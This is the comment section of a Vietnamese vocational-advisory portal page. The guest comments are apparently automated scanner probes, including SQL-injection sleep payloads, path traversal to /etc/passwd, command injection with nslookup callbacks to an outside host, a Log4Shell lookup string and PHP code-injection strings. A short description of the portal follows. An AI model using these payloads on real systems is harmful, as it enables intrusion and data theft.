  http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
  Khách 19-07-2024 09:41 CH
  '"()
  Khách 19-07-2024 09:40 CH
  ^(#$!@#$)(()))******
  Khách 19-07-2024 09:40 CH
  !(()&&!|*|*|
  Khách 19-07-2024 09:40 CH
  )
  Khách 19-07-2024 09:40 CH
  &n959891=v902397
  Khách 19-07-2024 09:40 CH
  ${9999193+9999427}
  Khách 19-07-2024 09:40 CH
  12345'"\'\");|]*{ <>�''💡
  Khách 19-07-2024 09:40 CH
  ./
  Khách 19-07-2024 09:40 CH
  ../
  Khách 19-07-2024 09:40 CH
  ../../../../../../../../../../../../../../windows/win.ini
  Khách 19-07-2024 09:40 CH
  ../../../../../../../../../../../../../../etc/passwd
  Khách 19-07-2024 09:40 CH
  ;(nslookup hitullwqibhau19866.bxss.me||perl -e "gethostbyname('hitullwqibhau19866.bxss.me')")|(nslookup hitullwqibhau19866.bxss.me||perl -e "gethostbyname('hitullwqibhau19866.bxss.me')")&(nslookup hitullwqibhau19866.bxss.me||perl -e "gethostbyname('hitullwqibhau19866.bxss.me')")
  Khách 19-07-2024 09:40 CH
  `(nslookup hitkwkcpyvglp99100.bxss.me||perl -e "gethostbyname('hitkwkcpyvglp99100.bxss.me')")`
  Khách 19-07-2024 09:40 CH
  |(nslookup hitdunfnnwjim02636.bxss.me||perl -e "gethostbyname('hitdunfnnwjim02636.bxss.me')")
  Khách 19-07-2024 09:40 CH
  &(nslookup hitdnlmjaiuxv065c1.bxss.me||perl -e "gethostbyname('hitdnlmjaiuxv065c1.bxss.me')")&'\"`0&(nslookup hitdnlmjaiuxv065c1.bxss.me||perl -e "gethostbyname('hitdnlmjaiuxv065c1.bxss.me')")&`'
  Khách 19-07-2024 09:40 CH
  $(nslookup hitgdirnvjhlkaecde.bxss.me||perl -e "gethostbyname('hitgdirnvjhlkaecde.bxss.me')")
  Khách 19-07-2024 09:40 CH
  (nslookup hitmovashpgtj56542.bxss.me||perl -e "gethostbyname('hitmovashpgtj56542.bxss.me')")
  Khách 19-07-2024 09:40 CH
  |echo iwnyxn$()\ edsqkx\nz^xyu||a #' |echo iwnyxn$()\ edsqkx\nz^xyu||a #|" |echo iwnyxn$()\ edsqkx\nz^xyu||a #
  Khách 19-07-2024 09:40 CH
  &echo ndlykt$()\ dqnkmg\nz^xyu||a #' &echo ndlykt$()\ dqnkmg\nz^xyu||a #|" &echo ndlykt$()\ dqnkmg\nz^xyu||a #
  Khách 19-07-2024 09:40 CH
  echo tiesdn$()\ roukls\nz^xyu||a #' &echo tiesdn$()\ roukls\nz^xyu||a #|" &echo tiesdn$()\ roukls\nz^xyu||a #
  Khách 19-07-2024 09:40 CH
  ${j${::-n}di:dns${::-:}//hitalxzzlrwzx34194${::-.}bxss.me}
  Khách 19-07-2024 09:40 CH
  XayxFsyd
  Khách 19-07-2024 09:40 CH
  /../../../../../../../../../../windows/system32/BITSADMIN.exe
  Khách 19-07-2024 09:40 CH
  "+response.write(9706492*9582028)+"
  Khách 19-07-2024 09:40 CH
  '+response.write(9706492*9582028)+'
  Khách 19-07-2024 09:40 CH
  response.write(9706492*9582028)
  Khách 19-07-2024 08:11 CH
  @@1FNnm
  Khách 19-07-2024 08:11 CH
  1����%2527%2522
  Khách 19-07-2024 08:11 CH
  1'"
  Khách 19-07-2024 08:11 CH
  '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  Khách 19-07-2024 08:11 CH
  *DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  Khách 19-07-2024 08:11 CH
  Q9WfU9lJ')) OR 539=(SELECT 539 FROM PG_SLEEP(15))--
  Khách 19-07-2024 08:10 CH
  00ieMGUY') OR 415=(SELECT 415 FROM PG_SLEEP(15))--
  Khách 19-07-2024 08:10 CH
  m8j6UVtm' OR 100=(SELECT 100 FROM PG_SLEEP(15))--
  Khách 19-07-2024 08:10 CH
  -1)) OR 64=(SELECT 64 FROM PG_SLEEP(15))--
  Khách 19-07-2024 08:09 CH
  -5) OR 197=(SELECT 197 FROM PG_SLEEP(15))--
  Khách 19-07-2024 08:09 CH
  -5 OR 743=(SELECT 743 FROM PG_SLEEP(15))--
  Khách 19-07-2024 08:09 CH
  AU5WY7s3')); waitfor delay '0:0:15' --
  Khách 19-07-2024 08:09 CH
  k0Q813Ib'); waitfor delay '0:0:15' --
  Khách 19-07-2024 08:08 CH
  ZydKbaxQ'; waitfor delay '0:0:15' --
  Khách 19-07-2024 08:08 CH
  1 waitfor delay '0:0:15' --
  Khách 19-07-2024 08:08 CH
  -1)); waitfor delay '0:0:15' --
  Khách 19-07-2024 08:08 CH
  -1); waitfor delay '0:0:15' --
  Khách 19-07-2024 08:08 CH
  -1; waitfor delay '0:0:15' --
  Khách 19-07-2024 08:08 CH
  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  Khách 19-07-2024 08:07 CH
  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  Khách 19-07-2024 08:07 CH
  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  Khách 19-07-2024 08:07 CH
  if(now()=sysdate(),sleep(15),0)
  Khách 19-07-2024 08:06 CH
  -1 OR 3+94-94-1=0+0+0+1
  Khách 19-07-2024 08:06 CH
  -1 OR 2+94-94-1=0+0+0+1
  Khách 19-07-2024 08:06 CH
  1*
  Khách 19-07-2024 08:06 CH
  1*
  Khách 19-07-2024 08:06 CH
  1*
  Khách 19-07-2024 08:06 CH
  1*
  Khách 19-07-2024 08:06 CH
  YwQyhWYY
  Khách 19-07-2024 07:41 CH
  9035088
  Khách 19-07-2024 07:41 CH
  149/.
  Khách 19-07-2024 07:41 CH
  149
  Khách 19-07-2024 07:41 CH
  149
  Khách 19-07-2024 07:41 CH
  '.print(md5(31337)).'
  Khách 19-07-2024 07:41 CH
  '"
  Khách 19-07-2024 07:41 CH
  ${@print(md5(31337))}\
  Khách 19-07-2024 07:41 CH
  ${@print(md5(31337))}
  Khách 19-07-2024 07:41 CH
  ";print(md5(31337));$a="
  Khách 19-07-2024 07:41 CH
  ';print(md5(31337));$a='
  Khách 19-07-2024 07:41 CH
  '"()
  Khách 19-07-2024 07:41 CH
  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
  Khách 19-07-2024 07:41 CH
  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  Khách 19-07-2024 07:41 CH
  /xfs.bxss.me
  Khách 19-07-2024 07:41 CH
  bxss.me/t/xss.html?%00
  Khách 19-07-2024 07:41 CH
  HttP://bxss.me/t/xss.html?%00
  Khách 19-07-2024 07:41 CH
  '+'A'.concat(70-3).concat(22*4).concat(100).concat(90).concat(106).concat(70)+(require'socket' Socket.gethostbyname('hitjc'+'mltdinolbcbcc.bxss.me.')[3].to_s)+'
  Khách 19-07-2024 07:41 CH
  "+"A".concat(70-3).concat(22*4).concat(107).concat(87).concat(112).concat(75)+(require"socket" Socket.gethostbyname("hitfk"+"vbkdsnut71c9f.bxss.me.")[3].to_s)+"
  Khách 19-07-2024 07:41 CH
  bxss.me
  Khách 19-07-2024 07:41 CH
  http://bxss.me/t/fit.txt?.jpg
  Khách 19-07-2024 07:41 CH
  Http://bxss.me/t/fit.txt
  Khách 19-07-2024 07:41 CH
  1some_inexistent_file_with_long_name.jpg
  Khách 19-07-2024 07:41 CH
  http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
  Khách 19-07-2024 07:41 CH
  ${9999837+10000181}
  Khách 19-07-2024 07:41 CH
  ctime sleep p0 (I30 tp1 Rp2 .
  Khách 19-07-2024 07:41 CH
  ;(nslookup hittcbulkkownb789f.bxss.me||perl -e "gethostbyname('hittcbulkkownb789f.bxss.me')")|(nslookup hittcbulkkownb789f.bxss.me||perl -e "gethostbyname('hittcbulkkownb789f.bxss.me')")&(nslookup hittcbulkkownb789f.bxss.me||perl -e "gethostbyname('hittcbulkkownb789f.bxss.me')")
  Khách 19-07-2024 07:41 CH
  `(nslookup hitevzvryzvfw9e4f5.bxss.me||perl -e "gethostbyname('hitevzvryzvfw9e4f5.bxss.me')")`
  Khách 19-07-2024 07:41 CH
  |(nslookup hittykbrfiktf0fca8.bxss.me||perl -e "gethostbyname('hittykbrfiktf0fca8.bxss.me')")
  Khách 19-07-2024 07:41 CH
  &(nslookup hitqpovxqtcdf4d7f9.bxss.me||perl -e "gethostbyname('hitqpovxqtcdf4d7f9.bxss.me')")&'\"`0&(nslookup hitqpovxqtcdf4d7f9.bxss.me||perl -e "gethostbyname('hitqpovxqtcdf4d7f9.bxss.me')")&`'
  Khách 19-07-2024 07:41 CH
  $(nslookup hitictyyhbfei7eeb9.bxss.me||perl -e "gethostbyname('hitictyyhbfei7eeb9.bxss.me')")
  Khách 19-07-2024 07:41 CH
  (nslookup hitaboaplfzwx1fce3.bxss.me||perl -e "gethostbyname('hitaboaplfzwx1fce3.bxss.me')")
  Khách 19-07-2024 07:41 CH
  |echo nspdds$()\ wyvlra\nz^xyu||a #' |echo nspdds$()\ wyvlra\nz^xyu||a #|" |echo nspdds$()\ wyvlra\nz^xyu||a #
  Khách 19-07-2024 07:41 CH
  &echo htlqeu$()\ lnojnp\nz^xyu||a #' &echo htlqeu$()\ lnojnp\nz^xyu||a #|" &echo htlqeu$()\ lnojnp\nz^xyu||a #
  Khách 19-07-2024 07:41 CH
  echo hgqnom$()\ bregae\nz^xyu||a #' &echo hgqnom$()\ bregae\nz^xyu||a #|" &echo hgqnom$()\ bregae\nz^xyu||a #
  Khách 19-07-2024 07:41 CH
  ".gethostbyname(lc("hitow"."lnbendpab379b.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(68).chr(103).chr(68)."
  Khách 19-07-2024 07:41 CH
  '.gethostbyname(lc('hitdf'.'bsujypbz2ccc5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(79).chr(105).chr(82).'
  Khách 19-07-2024 07:41 CH
  ^(#$!@#$)(()))******
  Khách 19-07-2024 07:41 CH
  !(()&&!|*|*|
  Khách 19-07-2024 07:41 CH
  )
  Khách 19-07-2024 07:41 CH
  &n977541=v999677
  Khách 19-07-2024 07:41 CH
  6Hryn0wG
  Khách 19-07-2024 07:40 CH
  ./
  Khách 19-07-2024 07:40 CH
  ../
  Khách 19-07-2024 07:40 CH
  12345'"\'\");|]*{ <>�''💡
  Khách 19-07-2024 07:40 CH
  ../../../../../../../../../../../../../../windows/win.ini
  Khách 19-07-2024 07:40 CH
  ../../../../../../../../../../../../../../etc/passwd
  Khách 19-07-2024 07:40 CH
  "+response.write(9612141*9575672)+"
  Khách 19-07-2024 07:40 CH
  '+response.write(9612141*9575672)+'
  Khách 19-07-2024 07:40 CH
  response.write(9612141*9575672)
  Khách 19-07-2024 07:40 CH
  ${j${::-n}di:dns${::-:}//hittioynjqqul0d10a${::-.}bxss.me}
  Khách 19-07-2024 07:40 CH
  /../../../../../../../../../../windows/system32/BITSADMIN.exe

  Nội dung khác gần đây
  Tổng số bài viết: 53
  Cổng thông tin Hội đồng tư vấn nghề hỗ trợ trao đổi thông tin và điều phối hoạt động một cách hiệu quả của từng HĐTVN và giữa các HĐTVN. Cổng thông tin cho phép quản lý hoạt động, nhân rộng kết quả, trao đổi kinh nghiệm và bài học thành công, chia sẻ tài nguyên, tài liệu liên quan đến ngành nghề đào tạo và tư vấn, thảo luận các thách thức và giải pháp, công khai và truyền thông hoạt động của các HĐTVN, góp phần thúc đẩy mạnh mẽ hoạt động hợp tác nhà trường – doanh nghiệp, nâng cao chất lượng đào tạo.

  Thông tin liên hệ:
  • Email Cổng thông tin: iaboardsystem@gmail.com